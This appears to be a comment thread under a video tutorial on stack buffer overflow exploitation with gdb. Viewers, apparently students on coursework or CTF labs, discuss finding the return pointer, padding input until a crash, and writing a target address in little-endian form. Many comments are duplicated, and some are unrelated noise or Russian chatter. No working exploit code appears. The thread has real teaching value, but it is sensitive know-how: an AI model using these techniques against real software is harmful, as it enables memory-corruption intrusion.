The only thing that is NOT CLEAR from this video is how you guessed the return address? How did you know exactly which address should be replaced by B ascii values?
Love this gdb stuff very little missing I assume after access granted on a real system the operating system or private code would still run or would you have to point to it
You can find it out by checking push/pop instructions, which push items onto the stack frame or pop from it , in the disassembled function. The return pointer of a function is pushed on the stack when it's called,.
Thank youuuuu I have a little problem, saying that I can write into the buffer through an argv[1] once I figure how much character I need and I figute what the return pointer address is, if I execute ./program my payload + p32(address I need in hex) when I check gdb the return address changed but not to the address I need it to be, as if it read the "\" and the "x" of the little endian p32 as a value on their own, how can I change that?
first you do break main, then when you run and it hits the first break point at main you can do info frame and it will give you the rbp/ebp (depending on whether you run on 64 or 32 bit architecture). It will also give you the eip/rip this is the location of the return pointer
because the value we are storing at a particular memory address must be stored in hex. Little endian specifies that it is already in hex otherwise we would not be able to differentiate between python string or python reference to hex value
This does not work! maybe it did on what ever system you used ? But it doesn't work on unbuntu 20.04, cannot over write return of gets, no matter what I try!
first you do break main, then when you run and it hits the first break point at main you can do info frame and it will give you the rbp/ebp (depending on whether you run on 64 or 32 bit architecture). It will also give you the eip/rip this is the location of the return pointer.
Seems you’ve stopped posting vids...but this is by far the best intro to BO and gdp our there. I salute you good sir, and please come back!
True
I agree. This was so much fun watching a BO practical example. I quite enjoyed it. 🤟✌️👏👏👏
This guy is freaking awesome. He explains it so much better than my professor :D.
Best video explanation of this seemingly complicated topic, thank you!
Hi James, very nice video. I am interested in system programming, and it is so difficult to find a tutorial video like this. Please don't stop.
This is literally some of the best and practical explaination conveyed so nicely, a low level stuff (pun intended :D), great respect
sooo helpful - would have been up all night doing my pset if it weren't for this video
Extremely well explained! 😊
The only thing that is NOT CLEAR from this video is how you guessed the return address? How did you know exactly which address should be replaced by B ascii values?
“x/1x $sp” should work
I am delighted, acquire so much understandable infromations , TY man!
beautiful!!! just what I was after!
How did you find the return pointer just by looking at the stack?
experience i think
Trail and error , you gotta enter dump values like A until you hit a segmentation fault
Love this gdb stuff very little missing I assume after access granted on a real system the operating system or private code would still run or would you have to point to it
thank you so much for clear explanation. Please where can I find a full course of your courses ?
Thanks for this wonderful analysis video....
I understood properly, thank you sir for the video
Could you explain how do we identify the return address?
anoop john by radarex
This video is really high quality content!
This video was so helpful, I watched it twice :)
Amazing explanation. Thanks a lot
James- great video
Thank you for your awesome how-to!
such a nice video
8:50 I'm really confused on how he can tell it's the return pointer
Exactly my point. how do u determine the return pointer
@@tlehloba Usually, trial and error
You can find it out by checking push/pop instructions, which push items onto the stack frame or pop from it , in the disassembled function. The return pointer of a function is pushed on the stack when it's called,.
@@kraken_norse thank you mann you saved the day
I do the same exact step but i only have seg fault. Can It be because the Memory region of my eip( return pointer) Is only readable?
much appreciation mate
If i want to put a shellcode , the return address is the bottom of the stacj ,isn't it ?
Great video sir!
Thank youuuuu I have a little problem, saying that I can write into the buffer through an argv[1] once I figure how much character I need and I figute what the return pointer address is, if I execute ./program my payload + p32(address I need in hex) when I check gdb the return address changed but not to the address I need it to be, as if it read the "\" and the "x" of the little endian p32 as a value on their own, how can I change that?
Why does the stack store new data towards the return pointer? Wouldn't going the opposite way ensure rp is never touched?
Well explained. I got the flag I was looking for.
awesome video explained so much
More videos plzz ..
Is it possible to exploit packet buffer overflow due to slow data rate
I'm finally getting it!!! 🎉
Your legends sir your best ... You rock ..
When you print the stack with x/##x $esp, the first address that you call the offset, is that just the first address of the following 4 * 4 bytes?
Another good one keep up you have good representation way
Superb
how do i ignore the gcc errors because of the implicit declarations of the "gets" function
How to identify the return pointer?
first you do break main, then when you run and it hits the first break point at main you can do info frame and it will give you the rbp/ebp (depending on whether you run on 64 or 32 bit architecture). It will also give you the eip/rip this is the location of the return pointer
This is awesome
V well explained
Thank you sooo much
good stuff
Everything was great, but I just couldn't get access granted
awesome
You do know u used the same superman lone in both buffer videos right? Haha just teasing thank you for answering questions that nobody else could
what if we do not have an $esp register after the gets function? instead I have $rax register
its 64-bit application,you will find $rsp instead of $esp
Which software is this?
The code is not compiling
Anybody else getting a cannot access memory address error after setting breakpoints?
❤
>>Thank U so much
Why does the address of the granted function needs to be written down in little endian?
because the value we are storing at a particular memory address must be stored in hex. Little endian specifies that it is already in hex otherwise we would not be able to differentiate between python string or python reference to hex value
Кто сделал лабу? В лс скиньте плез)
This does not work! maybe it did on what ever system you used ? But it doesn't work on unbuntu 20.04, cannot over write return of gets, no matter what I try!
teach me more about hacking an android device
ne och
+Abay Zhunus главное дедлайн продлили)
ai dento
Тем временем до дедлайна 47 минут
Instead of 0x41414141 I get 0x565561f5 which is my ret address.
I got the address working when I used the example code from kuafu1994.github.io/HackWithGDB/ASM.html
Че там 8 лабка ма? ахахахахха
Какая ? )
В будущем это уже 7я лаба)😂
nbbbbbnbnbnkjbjkbjkbjkbjkbjkbjkbjkbjkbkjbjkb
Has anyone really been far even as decided to use even go want to do look more like?
Oatify Er... take a deep breath and then try again...
you don't use nano? I can't watch this.
can I have your linkedin account i've a challnge for u
How to identify the return pointer?
first you do break main, then when you run and it hits the first break point at main you can do info frame and it will give you the rbp/ebp (depending on whether you run on 64 or 32 bit architecture). It will also give you the eip/rip this is the location of the return pointer.
@@breakingcode92 How do you determine eip/rip?